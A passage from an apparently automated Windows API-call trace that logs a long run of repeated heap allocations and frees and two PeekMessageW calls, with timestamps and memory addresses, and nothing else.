(in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.594] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.594] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.595] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.595] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0195.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0195.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.599] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0195.599] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.599] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0195.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0195.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0195.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaf50 | out: hHeap=0x620000) returned 1 [0195.602] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0195.602] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaf50 [0195.602] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0195.602] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.602] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.603] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.603] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.603] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.603] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.603] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.603] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.603] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.603] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.604] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.604] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.604] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.604] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.604] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.605] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.605] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.605] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.605] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.605] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0195.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0195.607] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.607] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0195.607] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.607] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.607] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.608] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.608] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.608] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.608] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0195.608] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.609] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.609] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.609] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0195.609] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.609] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.609] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.609] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0195.610] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.610] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.610] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.610] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.610] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.611] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.611] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.611] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.611] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.611] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.611] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.611] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0195.612] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.612] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0195.613] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.613] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.613] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.613] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.613] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.614] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.614] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.614] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.614] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.615] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.615] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.615] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.615] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.615] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.615] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.615] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.616] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.616] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.616] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.616] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.616] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.617] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.617] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.617] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.617] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.618] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.618] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.618] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0195.619] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.619] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0195.619] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.620] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.620] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0195.620] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0195.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.621] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.621] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0195.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0195.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0195.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0195.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0195.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0195.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0195.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0195.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0195.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0195.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0195.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0195.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0195.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.640] RtlAllocateHeap 